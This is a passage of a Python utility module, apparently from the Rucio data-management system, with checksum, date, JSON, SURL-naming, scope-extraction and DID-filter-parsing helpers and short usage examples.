Relies on GLOBALLY_SUPPORTED_CHECKSUMS to allow for expandability.
:param checksum_name: The name of the checksum to be verified.
:returns: True if checksum_name is in GLOBALLY_SUPPORTED_CHECKSUMS list, False otherwise.
"""
return checksum_name in GLOBALLY_SUPPORTED_CHECKSUMS
def set_preferred_checksum(checksum_name):
"""
A simple function to set the preferred checksum algorithm, provided it is supported.
Relies on GLOBALLY_SUPPORTED_CHECKSUMS to allow for expandability.
:param checksum_name: The name of the checksum to set as preferred.
"""
if is_checksum_valid(checksum_name):
global PREFERRED_CHECKSUM
PREFERRED_CHECKSUM = checksum_name
def set_checksum_value(file, checksum_names_list):
for checksum_name in checksum_names_list:
if checksum_name in file['metadata'].keys() and file['metadata'][checksum_name]:
file['checksum'] = '%s:%s' % (checksum_name.upper(), str(file['metadata'][checksum_name]))
if checksum_name == PREFERRED_CHECKSUM:
break
def adler32(file):
"""
An Adler-32 checksum is obtained by calculating two 16-bit checksums A and B
and concatenating their bits into a 32-bit integer. A is the sum of all bytes in the
stream plus one, and B is the sum of the individual values of A from each step.
:param file: file name
:returns: Hexified string, padded to 8 values.
"""
# adler starting value is _not_ 0
adler = 1
can_mmap = False
try:
with open(file, 'r+b') as f:
can_mmap = True
except:
pass
try:
# use mmap if possible
if can_mmap:
with open(file, 'r+b') as f:
m = mmap.mmap(f.fileno(), 0)
# partial block reads at slightly increased buffer sizes
for block in iter(partial(m.read, io.DEFAULT_BUFFER_SIZE * 8), b''):
adler = zlib.adler32(block, adler)
else:
with open(file, 'rb') as f:
# partial block reads at slightly increased buffer sizes
for block in iter(partial(f.read, io.DEFAULT_BUFFER_SIZE * 8), b''):
adler = zlib.adler32(block, adler)
except Exception as e:
raise Exception('FATAL - could not get Adler-32 checksum of file %s: %s' % (file, e))
# backflip on 32bit -- can be removed once everything is fully migrated to 64bit
if adler < 0:
adler = adler + 2 ** 32
return str('%08x' % adler)
CHECKSUM_ALGO_DICT['adler32'] = adler32
def md5(file):
"""
Runs the MD5 algorithm (RFC-1321) on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of 32 hexadecimal digits
"""
hash_md5 = hashlib.md5()
try:
with open(file, "rb") as f:
list(map(hash_md5.update, iter(lambda: f.read(4096), b"")))
except Exception as e:
raise Exception('FATAL - could not get MD5 checksum of file %s - %s' % (file, e))
return hash_md5.hexdigest()
CHECKSUM_ALGO_DICT['md5'] = md5
def sha256(file):
"""
Runs the SHA256 algorithm on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of 64 hexadecimal digits
"""
with open(file, "rb") as f:
bytes_ = f.read() # read entire file as bytes
readable_hash = hashlib.sha256(bytes_).hexdigest()
print(readable_hash)
return readable_hash
CHECKSUM_ALGO_DICT['sha256'] = sha256
def crc32(file):
"""
Runs the CRC32 algorithm on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of up to 8 hexadecimal digits
"""
prev = 0
for eachLine in open(file, "rb"):
prev = zlib.crc32(eachLine, prev)
return "%X" % (prev & 0xFFFFFFFF)
CHECKSUM_ALGO_DICT['crc32'] = crc32
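# A minimal sketch of the checksum dispatch table built above. The path argument is a
# hypothetical local file supplied by the caller; it must exist for the call to succeed.
def _example_checksum_dispatch(path):
    # PREFERRED_CHECKSUM is 'adler32' by default, so this resolves to the adler32() helper
    # and returns an 8-character hexadecimal string for the given file.
    algo = CHECKSUM_ALGO_DICT[PREFERRED_CHECKSUM]
    return algo(path)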
def str_to_date(string):
""" Converts a RFC-1123 string to the corresponding datetime value.
:param string: the RFC-1123 string to convert to datetime value.
"""
return datetime.datetime.strptime(string, DATE_FORMAT) if string else None
def val_to_space_sep_str(vallist):
""" Converts a list of values into a string of space separated values
:param vallist: the list of values to to convert into string
:return: the string of space separated values or the value initially passed as parameter
"""
try:
if isinstance(vallist, list):
return text_type(" ".join(vallist))
else:
return text_type(vallist)
except:
return text_type('')
def date_to_str(date):
""" Converts a datetime value to the corresponding RFC-1123 string.
:param date: the datetime value to convert.
"""
return datetime.datetime.strftime(date, DATE_FORMAT) if date else None
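# A minimal round-trip sketch for the RFC 1123 helpers above. The timestamp is an
# arbitrary example and the weekday abbreviation assumes the default C locale.
def _example_rfc1123_roundtrip():
    stamp = date_to_str(datetime.datetime(2022, 1, 1, 12, 0, 0))  # 'Sat, 01 Jan 2022 12:00:00 UTC'
    # Parsing the rendered string back should reproduce the original datetime.
    return str_to_date(stamp) == datetime.datetime(2022, 1, 1, 12, 0, 0)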
class APIEncoder(json.JSONEncoder):
""" Propretary JSONEconder subclass used by the json render function.
This is needed to address the encoding of special values.
"""
def default(self, obj): # pylint: disable=E0202
if isinstance(obj, datetime.datetime):
# convert any datetime to RFC 1123 format
return date_to_str(obj)
elif isinstance(obj, (datetime.time, datetime.date)):
# should not happen since the only date-like format
# supported at domain schema level is 'datetime'.
return obj.isoformat()
elif isinstance(obj, datetime.timedelta):
return obj.days * 24 * 60 * 60 + obj.seconds
elif isinstance(obj, Enum):
return obj.name
elif isinstance(obj, (InternalAccount, InternalScope)):
return obj.external
return json.JSONEncoder.default(self, obj)
def render_json(**data):
""" JSON render function
"""
return json.dumps(data, cls=APIEncoder)
def render_json_list(list_):
""" JSON render function for list
"""
return json.dumps(list_, cls=APIEncoder)
def datetime_parser(dct):
""" datetime parser
"""
for k, v in list(dct.items()):
if isinstance(v, string_types) and re.search(" UTC", v):
try:
dct[k] = datetime.datetime.strptime(v, DATE_FORMAT)
except Exception:
pass
return dct
def parse_response(data):
"""
JSON render function
"""
if hasattr(data, 'decode'):
data = data.decode('utf-8')
return json.loads(data, object_hook=datetime_parser)
def execute(cmd, blocking=True):
"""
Executes a command in a subprocess. Returns a tuple
of (exitcode, out, err), where out is the string output
from stdout and err is the string output from stderr when
executing the command.
:param cmd: Command string to execute
"""
process = subprocess.Popen(cmd,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
if blocking:
result = process.communicate()
(out, err) = result
exitcode = process.returncode
return exitcode, out.decode(encoding='utf-8'), err.decode(encoding='utf-8')
return process
def rse_supported_protocol_operations():
""" Returns a list with operations supported by all RSE protocols."""
return ['read', 'write', 'delete', 'third_party_copy', 'third_party_copy_read', 'third_party_copy_write']
def rse_supported_protocol_domains():
""" Returns a list with all supoorted RSE protocol domains."""
return ['lan', 'wan']
def grouper(iterable, n, fillvalue=None):
""" Collect data into fixed-length chunks or blocks """
# grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
args = [iter(iterable)] * n
return izip_longest(*args, fillvalue=fillvalue)
def chunks(iterable, n):
"""
Yield successive n-sized chunks from l.
"""
if isinstance(iterable, list):
for i in range(0, len(iterable), n):
yield iterable[i:i + n]
else:
it = iter(iterable)
while True:
chunk = list(itertools.islice(it, n))
if not chunk:
return
yield chunk
def dict_chunks(dict_, n):
"""
Iterate over the dictionary in groups of the requested size
"""
it = iter(dict_)
for _ in range(0, len(dict_), n):
yield {k: dict_[k] for k in itertools.islice(it, n)}
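# A minimal sketch of the chunking helpers above, using small hypothetical inputs.
def _example_chunking():
    # Lists are sliced: [['a', 'b'], ['c', 'd'], ['e']]
    list_chunks = list(chunks(['a', 'b', 'c', 'd', 'e'], 2))
    # Dictionaries are yielded in groups of keys: [{'a': 1, 'b': 2}, {'c': 3}]
    dict_groups = list(dict_chunks({'a': 1, 'b': 2, 'c': 3}, 2))
    return list_chunks, dict_groups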
def my_key_generator(namespace, fn, **kw):
"""
Customized key generator for dogpile
"""
fname = fn.__name__
def generate_key(*arg, **kw):
return namespace + "_" + fname + "_".join(str(s) for s in filter(None, arg))
return generate_key
def construct_surl_DQ2(dsn, filename):
"""
Defines relative SURL for new replicas. This method
contains DQ2 convention. To be used for non-deterministic sites.
Method imported from DQ2.
@return: relative SURL for new replica.
@rtype: str
"""
# check how many dots in dsn
fields = dsn.split('.')
nfields = len(fields)
if nfields == 0:
return '/other/other/%s' % (filename)
elif nfields == 1:
stripped_dsn = __strip_dsn(dsn)
return '/other/%s/%s' % (stripped_dsn, filename)
elif nfields == 2:
project = fields[0]
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s' % (project, stripped_dsn, filename)
elif nfields < 5 or re.match('user*|group*', fields[0]):
project = fields[0]
f2 = fields[1]
f3 = fields[2]
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s/%s/%s' % (project, f2, f3, stripped_dsn, filename)
else:
project = fields[0]
dataset_type = fields[4]
if nfields == 5:
tag = 'other'
else:
tag = __strip_tag(fields[-1])
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s/%s/%s' % (project, dataset_type, tag, stripped_dsn, filename)
def construct_surl_T0(dsn, filename):
"""
Defines relative SURL for new replicas. This method
contains Tier0 convention. To be used for non-deterministic sites.
@return: relative SURL for new replica.
@rtype: str
"""
fields = dsn.split('.')
nfields = len(fields)
if nfields >= 3:
return '/%s/%s/%s/%s/%s' % (fields[0], fields[2], fields[1], dsn, filename)
elif nfields == 1:
return '/%s/%s/%s/%s/%s' % (fields[0], 'other', 'other', dsn, filename)
elif nfields == 2:
return '/%s/%s/%s/%s/%s' % (fields[0], fields[1], 'other', dsn, filename)
elif nfields == 0:
return '/other/other/other/other/%s' % (filename)
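# A minimal sketch of the Tier-0 convention above, with a hypothetical DSN. For a DSN of
# three or more dot-separated fields the relative SURL is built from the first, third and
# second fields followed by the full DSN and the filename.
def _example_construct_surl_T0():
    # Expected: '/proj/stream/00123456/proj.00123456.stream/file.root'
    return construct_surl_T0('proj.00123456.stream', 'file.root')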
def construct_surl_BelleII(dsn, filename):
"""
Defines relative SURL for Belle II specific replicas.
This method contains the Belle II convention.
To be used for non-deterministic Belle II sites.
DSN (or datablock in the Belle II naming) contains /
"""
fields = dsn.split("/")
nfields = len(fields)
if nfields == 0:
return '/other/%s' % (filename)
else:
return '%s/%s' % (dsn, filename)
_SURL_ALGORITHMS = {}
_DEFAULT_SURL = 'DQ2'
_loaded_policy_modules = False
def register_surl_algorithm(surl_callable, name=None):
if name is None:
name = surl_callable.__name__
_SURL_ALGORITHMS[name] = surl_callable
register_surl_algorithm(construct_surl_T0, 'T0')
register_surl_algorithm(construct_surl_DQ2, 'DQ2')
register_surl_algorithm(construct_surl_BelleII, 'BelleII')
def construct_surl(dsn, filename, naming_convention=None):
global _loaded_policy_modules
if not _loaded_policy_modules:
# on first call, register any SURL functions from the policy packages
register_policy_package_algorithms('surl', _SURL_ALGORITHMS)
_loaded_policy_modules = True
if naming_convention is None or naming_convention not in _SURL_ALGORITHMS:
naming_convention = _DEFAULT_SURL
return _SURL_ALGORITHMS[naming_convention](dsn, filename)
def __strip_dsn(dsn):
"""
Drop the _sub and _dis suffixes for panda datasets from the lfc path
they will be registered in.
Method imported from DQ2.
"""
suffixes_to_drop = ['_dis', '_sub', '_frag']
fields = dsn.split('.')
last_field = fields[-1]
try:
for suffix in suffixes_to_drop:
last_field = re.sub('%s.*$' % suffix, '', last_field)
except IndexError:
return dsn
fields[-1] = last_field
stripped_dsn = '.'.join(fields)
return stripped_dsn
def __strip_tag(tag):
"""
Drop the _sub and _dis suffixes for panda datasets from the lfc path
they will be registered in
Method imported from DQ2.
"""
suffixes_to_drop = ['_dis', '_sub', '_tid']
stripped_tag = tag
try:
for suffix in suffixes_to_drop:
stripped_tag = re.sub('%s.*$' % suffix, '', stripped_tag)
except IndexError:
return stripped_tag
return stripped_tag
def clean_surls(surls):
res = []
for surl in surls:
if surl.startswith('srm'):
surl = re.sub(':[0-9]+/', '/', surl)
surl = re.sub(r'/srm/managerv1\?SFN=', '', surl)
surl = re.sub(r'/srm/v2/server\?SFN=', '', surl)
surl = re.sub(r'/srm/managerv2\?SFN=', '', surl)
if '?GoogleAccessId' in surl:
surl = surl.split('?GoogleAccessId')[0]
if '?X-Amz' in surl:
surl = surl.split('?X-Amz')[0]
res.append(surl)
res.sort()
return res
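# A minimal sketch of SURL cleaning, using a hypothetical SRM endpoint. The port and the
# web-service prefix are stripped, leaving the bare path on the storage host.
def _example_clean_surls():
    # Expected: ['srm://se.example.org/pnfs/example/file1']
    return clean_surls(['srm://se.example.org:8446/srm/managerv2?SFN=/pnfs/example/file1'])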
_EXTRACT_SCOPE_ALGORITHMS = {}
_DEFAULT_EXTRACT = 'atlas'
_loaded_policy_package_scope_algorithms = False
def extract_scope_atlas(did, scopes):
# Try to extract the scope from the DSN
if did.find(':') > -1:
if len(did.split(':')) > 2:
raise RucioException('Too many colons. Cannot extract scope and name')
scope, name = did.split(':')[0], did.split(':')[1]
if name.endswith('/'):
name = name[:-1]
return scope, name
else:
scope = did.split('.')[0]
if did.startswith('user') or did.startswith('group'):
scope = ".".join(did.split('.')[0:2])
if did.endswith('/'):
did = did[:-1]
return scope, did
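# A minimal sketch of the ATLAS scope extraction above, with hypothetical DIDs.
def _example_extract_scope_atlas():
    # Explicit scope: the part before the colon is used as-is.
    explicit = extract_scope_atlas('mc16_13TeV:EVNT.12345._000001.pool.root', scopes=None)
    # No colon: the scope is derived from the leading field(s), 'user.jdoe' here.
    derived = extract_scope_atlas('user.jdoe.test.dataset', scopes=None)
    return explicit, derived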
def extract_scope_dirac(did, scopes):
# Default dirac scope extract algorithm. Scope is the second element in the LFN or the first one (VO name)
# if only one element is the result of a split.
elem = did.rstrip('/').split('/')
if len(elem) > 2:
scope = elem[2]
else:
scope = elem[1]
return scope, did
def extract_scope_belleii(did, scopes):
split_did = did.split('/')
if did.startswith('/belle/MC/'):
if did.startswith('/belle/MC/BG') or \
did.startswith('/belle/MC/build') or \
did.startswith('/belle/MC/generic') or \
did.startswith('/belle/MC/log') or \
did.startswith('/belle/MC/mcprod') or \
did.startswith('/belle/MC/prerelease') or \
did.startswith('/belle/MC/release'):
return 'mc', did
if did.startswith('/belle/MC/cert') or \
did.startswith('/belle/MC/dirac') or \
did.startswith('/belle/MC/dr3') or \
did.startswith('/belle/MC/fab') or \
did.startswith('/belle/MC/hideki') or \
did.startswith('/belle/MC/merge') or \
did.startswith('/belle/MC/migration') or \
did.startswith('/belle/MC/skim') or \
did.startswith('/belle/MC/test'):
return 'mc_tmp', did
if len(split_did) > 4:
if split_did[3].find('fab') > -1 or split_did[3].find('merge') > -1 or split_did[3].find('skim') > -1:
return 'mc_tmp', did
if split_did[3].find('release') > -1:
return 'mc', did
return 'mc_tmp', did
if did.startswith('/belle/Raw/'):
return 'raw', did
if did.startswith('/belle/hRaw'):
return 'hraw', did
if did.startswith('/belle/user/'):
if len(split_did) > 4:
if len(split_did[3]) == 1 and 'user.%s' % (split_did[4]) in scopes:
return 'user.%s' % split_did[4], did
if len(split_did) > 3:
if 'user.%s' % (split_did[3]) in scopes:
return 'user.%s' % split_did[3], did
return 'user', did
if did.startswith('/belle/group/'):
if len(split_did) > 4:
if 'group.%s' % (split_did[4]) in scopes:
return 'group.%s' % split_did[4], did
return 'group', did
if did.startswith('/belle/data/') or did.startswith('/belle/Data/'):
if len(split_did) > 4:
if split_did[3] in ['fab', 'skim']: # /belle/Data/fab --> data_tmp
return 'data_tmp', did
if split_did[3].find('release') > -1: # /belle/Data/release --> data
return 'data', did
if len(split_did) > 5:
if split_did[3] in ['proc']: # /belle/Data/proc
if split_did[4].find('release') > -1: # /belle/Data/proc/release*
if len(split_did) > 7 and split_did[6] in ['GCR2c', 'prod00000007', 'prod6b', 'proc7b',
'proc8b', 'Bucket4', 'Bucket6test', 'bucket6',
'proc9', 'bucket7', 'SKIMDATAx1', 'proc10Valid',
'proc10', 'SkimP10x1', 'SkimP11x1', 'SkimB9x1',
'SkimB10x1', 'SkimB11x1']: # /belle/Data/proc/release*/*/proc10/* --> data_tmp (Old convention)
return 'data_tmp', did
else: # /belle/Data/proc/release*/*/proc11/* --> data (New convention)
return 'data', did
if split_did[4].find('fab') > -1: # /belle/Data/proc/fab* --> data_tmp
return 'data_tmp', did
return 'data_tmp', did
if did.startswith('/belle/ddm/functional_tests/') or did.startswith('/belle/ddm/tests/') or did.startswith('/belle/test/ddm_test'):
return 'test', did
if did.startswith('/belle/BG/'):
return 'data', did
if did.startswith('/belle/collection'):
return 'collection', did
return 'other', did
def register_extract_scope_algorithm(extract_callable, name=None):
if name is None:
name = extract_callable.__name__
_EXTRACT_SCOPE_ALGORITHMS[name] = extract_callable
register_extract_scope_algorithm(extract_scope_atlas, 'atlas')
register_extract_scope_algorithm(extract_scope_belleii, 'belleii')
register_extract_scope_algorithm(extract_scope_dirac, 'dirac')
def extract_scope(did, scopes=None, default_extract=_DEFAULT_EXTRACT):
global _loaded_policy_package_scope_algorithms
if not _loaded_policy_package_scope_algorithms:
register_policy_package_algorithms('scope', _EXTRACT_SCOPE_ALGORITHMS)
_loaded_policy_package_scope_algorithms = True
extract_scope_convention = config_get('common', 'extract_scope', False, None)
if extract_scope_convention is None or extract_scope_convention not in _EXTRACT_SCOPE_ALGORITHMS:
extract_scope_convention = default_extract
return _EXTRACT_SCOPE_ALGORITHMS[extract_scope_convention](did=did, scopes=scopes)
def pid_exists(pid):
"""
Check whether pid exists in the current process table.
UNIX only.
"""
if pid < 0:
return False
if pid == 0:
# According to "man 2 kill" PID 0 refers to every process
# in the process group of the calling process.
# On certain systems 0 is a valid PID but we have no way
# to know that in a portable fashion.
raise ValueError('invalid PID 0')
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
# ESRCH == No such process
return False
elif err.errno == errno.EPERM:
# EPERM clearly means there's a process to deny access to
return True
else:
# According to "man 2 kill" possible error values are
# (EINVAL, EPERM, ESRCH)
raise
else:
return True
def sizefmt(num, human=True):
"""
Return a human readable file size string
"""
if num is None:
return '0.0 B'
try:
num = int(num)
if human:
for unit in ['', 'k', 'M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 1000.0:
return "%3.3f %sB" % (num, unit)
num /= 1000.0
return "%.1f %sB" % (num, 'Y')
else:
return str(num)
except OverflowError:
return 'Inf'
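# A minimal sketch of sizefmt with an arbitrary byte count. Units are decimal (powers of 1000).
def _example_sizefmt():
    human = sizefmt(1234567)              # expected '1.235 MB'
    raw = sizefmt(1234567, human=False)   # expected '1234567'
    return human, raw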
def get_tmp_dir():
"""
Get a path under which to store temporary files.
Rucio relies on the standard list of temporary directories searched by the tempfile module. The list is:
The directory named by the TMPDIR environment variable.
The directory named by the TEMP environment variable.
The directory named by the TMP environment variable.
As a last resort, the /tmp/ directory.
:return: A path.
"""
base_dir = os.path.abspath(tempfile.gettempdir())
try:
return os.path.join(base_dir, getpass.getuser())
except Exception:
pass
try:
return os.path.join(base_dir, str(os.getuid()))
except Exception:
pass
return base_dir
def is_archive(name):
'''
Check if a file name is an archive file or not.
:return: A boolean.
'''
regexp = r'^.*\.(zip|zipx|tar.gz|tgz|tar.Z|tar.bz2|tbz2)(\.\d+)*$'
if re.match(regexp, name, re.I):
return True
return False
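# A minimal sketch of the archive-name check above, with hypothetical file names.
def _example_is_archive():
    return is_archive('logs.tar.gz'), is_archive('data.root')  # expected (True, False)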
class Color:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
def detect_client_location():
"""
Normally the client IP will be set on the server side (request.remote_addr).
Here the IP is set to the one the host itself sees. No traffic is actually sent
to the Google DNS servers; the UDP socket is only used to pick a local address.
Try to determine the sitename automatically from common environment variables,
in this order: SITE_NAME, ATLAS_SITE_NAME, OSG_SITE_NAME. If none of these exist
use the fixed string 'ROAMING'.
If the RUCIO_LATITUDE and RUCIO_LONGITUDE environment variables set a location, it is used.
"""
ip = None
try:
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.connect(("2001:4860:4860:0:0:0:0:8888", 80))
ip = s.getsockname()[0]
except Exception:
pass
if not ip:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
ip = s.getsockname()[0]
except Exception:
pass
if not ip:
ip = '0.0.0.0'
site = os.environ.get('SITE_NAME',
os.environ.get('ATLAS_SITE_NAME',
os.environ.get('OSG_SITE_NAME',
'ROAMING')))
latitude = os.environ.get('RUCIO_LATITUDE')
longitude = os.environ.get('RUCIO_LONGITUDE')
if latitude and longitude:
try:
latitude = float(latitude)
longitude = float(longitude)
except ValueError:
latitude = longitude = 0
print('Client set latitude and longitude are not valid.')
else:
latitude = longitude = None
return {'ip': ip,
'fqdn': socket.getfqdn(),
'site': site,
'latitude': latitude,
'longitude': longitude}
def ssh_sign(private_key, message):
"""
Sign a string message using the private key.
:param private_key: The SSH RSA private key as a string.
:param message: The message to sign as a string.
:return: Base64 encoded signature as a string.
"""
if PY3 and isinstance(message, str):
message = message.encode()
if not EXTRA_MODULES['paramiko']:
raise MissingModuleException('The paramiko module is not installed or faulty.')
sio_private_key = StringIO(private_key)
priv_k = RSAKey.from_private_key(sio_private_key)
sio_private_key.close()
signature_stream = priv_k.sign_ssh_data(message)
signature_stream.rewind()
base64_encoded = base64.b64encode(signature_stream.get_remainder())
if PY3:
base64_encoded = base64_encoded.decode()
return base64_encoded
def make_valid_did(lfn_dict):
"""
When managing information about a LFN (such as in `rucio upload` or
the RSE manager's upload), we add the `filename` attribute to record
the name of the file on the local disk in addition to the remainder
of the DID information.
This function will take that python dictionary, and strip out the
additional `filename` key. If this is not done, then the dictionary
will not pass the DID JSON schema validation.
"""
if 'filename' not in lfn_dict:
return lfn_dict
lfn_copy = dict(lfn_dict)
lfn_copy['name'] = lfn_copy.get('name', lfn_copy['filename'])
del lfn_copy['filename']
return lfn_copy
def send_trace(trace, trace_endpoint, user_agent, retries=5):
"""
Send the given trace to the trace endpoint
:param trace: the trace dictionary to send
:param trace_endpoint: the endpoint where the trace should be sent
:param user_agent: the user agent sending the trace
:param retries: the number of retries if sending fails
:return: 0 on success, 1 on failure
"""
if user_agent.startswith('pilot'):
return 0
for dummy in range(retries):
try:
requests.post(trace_endpoint + '/traces/', verify=False, data=json.dumps(trace))
return 0
except Exception:
pass
return 1
def add_url_query(url, query):
"""
Add a new dictionary to URL parameters
:param url: The existing URL
:param query: A dictionary containing key/value pairs to be added to the URL
:return: The expanded URL with the new query parameters
"""
url_parts = list(urlparse(url))
mod_query = dict(parse_qsl(url_parts[4]))
mod_query.update(query)
url_parts[4] = urlencode(mod_query)
return urlunparse(url_parts)
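# A minimal sketch of add_url_query, merging a new parameter into a hypothetical URL
# that already carries a query string.
def _example_add_url_query():
    # Expected: 'https://rucio.example.org/dids?limit=10&offset=20'
    return add_url_query('https://rucio.example.org/dids?limit=10', {'offset': '20'})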
def get_bytes_value_from_string(input_string):
"""
Get bytes from a string that represents a storage value and unit
:param input_string: String containing a value and a unit
:return: Integer value representing the value in bytes
"""
result = re.findall('^([0-9]+)([A-Za-z]+)$', input_string)
if result:
value = int(result[0][0])
unit = result[0][1].lower()
if unit == 'b':
value = value
elif unit == 'kb':
value = value * 1000
elif unit == 'mb':
value = value * 1000000
elif unit == 'gb':
value = value * 1000000000
elif unit == 'tb':
value = value * 1000000000000
elif unit == 'pb':
value = value * 1000000000000000
else:
return False
return value
else:
return False
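# A minimal sketch of the size-string parser above. Only integer values with a unit
# suffix are accepted; anything else yields False.
def _example_get_bytes_value_from_string():
    parsed = get_bytes_value_from_string('100MB')    # expected 100000000
    rejected = get_bytes_value_from_string('1.5GB')  # expected False (non-integer value)
    return parsed, rejected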
def parse_did_filter_from_string(input_string):
"""
Parse DID filter options in format 'length<3,type=all' from string.
:param input_string: String containing the filter options.
:return: filter dictionary and type as string.
"""
filters = {}
type_ = 'collection'
if input_string:
filter_options = input_string.replace(' ', '').split(',')
for option in filter_options:
value = None
key = None
if '>=' in option:
key, value = option.split('>=')
if key == 'length':
key = 'length.gte'
elif '>' in option:
key, value = option.split('>')
if key == 'length':
key = 'length.gt'
elif '<=' in option:
key, value = option.split('<=')
if key == 'length':
key = 'length.lte'
elif '<' in option:
key, value = option.split('<')
if key == 'length':
key = 'length.lt'
elif '=' in option:
key, value = option.split('=')
if key == 'created_after' or key == 'created_before':
value = datetime.datetime.strptime(value, '%Y-%m-%dT%H:%M:%S.%fZ')
if key == 'type':
if value.upper() in ['ALL', 'COLLECTION', 'CONTAINER', 'DATASET', 'FILE']:
type_ = value.lower()
else:
raise InvalidType('{0} is not a valid type. Valid types are {1}'.format(value, ['ALL', 'COLLECTION', 'CONTAINER', 'DATASET', 'FILE']))
elif key in ('length.gt', 'length.lt', 'length.gte', 'length.lte', 'length'):
try:
value = int(value)
filters[key] = value
except ValueError:
raise ValueError('Length has to be an integer value.')
filters[key] = value
elif isinstance(value, string_types):
if value.lower() == 'true':
value = '1'
elif value.lower() == 'false':
value = '0'
filters[key] = value
else:
filters[key] = value
return filters, type_
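# A minimal sketch of the simple filter parser above, using a hypothetical filter string.
def _example_parse_did_filter_from_string():
    # Expected: ({'length.lt': 3}, 'dataset')
    return parse_did_filter_from_string('length<3,type=dataset')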
def parse_did_filter_from_string_fe(input_string, name='*', type='collection', omit_name=False):
"""
Parse DID filter string for the filter engine (fe).
Should adhere to the following conventions:
- ';' represents the logical OR operator
- ',' represents the logical AND operator
- all operators belong to set of (<=, >=, ==, !=, >, <, =)
- there should be no duplicate key+operator criteria.
One sided and compound inequalities are supported.
Sanity checking of input is left to the filter engine.
:param input_string: String containing the filter options.
:param name: DID name.
:param type: The type of the did: all(container, dataset, file), collection(dataset or container), dataset, container.
:param omit_name: omit addition of name to filters.
:return: list of dictionaries with each dictionary as a separate OR expression.
"""
# lookup table unifying all comprehended operators to a nominal suffix.
# note that the order matters as the regex engine is eager, e.g. don't want to evaluate '<=' as '<' and '='.
operators_suffix_LUT = OrderedDict({
'<=': 'lte',
'>=': 'gte',
'==': '',
'!=': 'ne',
'>': 'gt',
'<': 'lt',
'=': ''
})
# lookup table mapping operator opposites, used to reverse compound inequalities.
operator_opposites_LUT = {
'lt': 'gt',
'lte': 'gte'
}
operator_opposites_LUT.update({op2: op1 for op1, op2 in operator_opposites_LUT.items()})
filters = []
if input_string:
or_groups = list(filter(None, input_string.split(';'))) # split <input_string> into OR clauses
for or_group in or_groups:
or_group = or_group.strip()
and_groups = list(filter(None, or_group.split(','))) # split <or_group> into AND clauses
and_group_filters = {}
for and_group in and_groups:
and_group = and_group.strip()
# tokenise this AND clause using operators as delimiters.
tokenisation_regex = "({})".format('|'.join(operators_suffix_LUT.keys()))
and_group_split_by_operator = list(filter(None, re.split(tokenisation_regex, and_group)))
if len(and_group_split_by_operator) == 3: # this is a one-sided inequality or expression
key, operator, value = [token.strip() for token in and_group_split_by_operator]
# substitute input operator with the nominal operator defined by the LUT, <operators_suffix_LUT>.
operator_mapped = operators_suffix_LUT.get(operator)
filter_key_full = key
if operator_mapped is not None:
if operator_mapped:
filter_key_full = "{}.{}".format(key, operator_mapped)
else:
raise DIDFilterSyntaxError("{} operator not understood.".format(operator_mapped))
if filter_key_full in and_group_filters:
raise DuplicateCriteriaInDIDFilter(filter_key_full)
else:
and_group_filters[filter_key_full] = value
elif len(and_group_split_by_operator) == 5: # this is a compound inequality
value1, operator1, key, operator2, value2 = [token.strip() for token in and_group_split_by_operator]
# substitute input operator with the nominal operator defined by the LUT, <operators_suffix_LUT>.
operator1_mapped = operator_opposites_LUT.get(operators_suffix_LUT.get(operator1))
operator2_mapped = operators_suffix_LUT.get(operator2)
filter_key1_full = filter_key2_full = key
if operator1_mapped is not None and operator2_mapped is not None:
if operator1_mapped: # ignore '' operator (maps from equals)
filter_key1_full = "{}.{}".format(key, operator1_mapped)
if operator2_mapped: # ignore '' operator (maps from equals)
filter_key2_full = "{}.{}".format(key, operator2_mapped)
else:
raise DIDFilterSyntaxError("{} operator not understood.".format(operator_mapped))
if filter_key1_full in and_group_filters:
raise DuplicateCriteriaInDIDFilter(filter_key1_full)
else:
and_group_filters[filter_key1_full] = value1
if filter_key2_full in and_group_filters:
raise DuplicateCriteriaInDIDFilter(filter_key2_full)
else:
and_group_filters[filter_key2_full] = value2
else:
raise DIDFilterSyntaxError(and_group)
# add name key to each AND clause if it hasn't already been populated from the filter and <omit_name> not set.
if not omit_name and 'name' not in and_group_filters:
and_group_filters['name'] = name
filters.append(and_group_filters)
else:
if not omit_name:
filters.append({
'name': name
})
return filters, type
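# A minimal usage sketch for parse_did_filter_from_string_fe; the filter string and keys
# below are purely illustrative. Values stay as strings because sanity checking is left
# to the filter engine.
def _example_parse_did_filter_fe():
    filters, did_type = parse_did_filter_from_string_fe('1 < length < 10, datatype=AOD; name=higgs*')
    # Expected shape of the result (two OR groups, each a dict of AND criteria):
    # filters == [
    #     {'length.gt': '1', 'length.lt': '10', 'datatype': 'AOD', 'name': '*'},
    #     {'name': 'higgs*'},
    # ]
    # did_type == 'collection' (the default)
    return filters, did_type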
def parse_replicas_from_file(path):
"""
Parses the output of list_replicas from a json or metalink file
into a dictionary. Metalink parsing is tried first and if it fails
it tries to parse json.
:param path: the path to the input file
:returns: a list with a dictionary for each file
"""
with open(path) as fp:
try:
root = ElementTree.parse(fp).getroot()
return parse_replicas_metalink(root)
except ElementTree.ParseError as xml_err:
try:
return json.load(fp)
except ValueError as json_err:
raise MetalinkJsonParsingError(path, xml_err, json_err)
def parse_replicas_from_string(string):
"""
Parses the output of list_replicas from a json or metalink string
into a dictionary. Metalink parsing is tried first and if it fails
it tries to parse json.
:param string: the string to parse
:returns: a list with a dictionary for each file
"""
try:
root = ElementTree.fromstring(string)
return parse_replicas_metalink(root)
except ElementTree.ParseError as xml_err:
try:
return json.loads(string)
except ValueError as json_err:
raise MetalinkJsonParsingError(string, xml_err, json_err)
def parse_replicas_metalink(root):
"""
Transforms the metalink tree into a list of dictionaries where
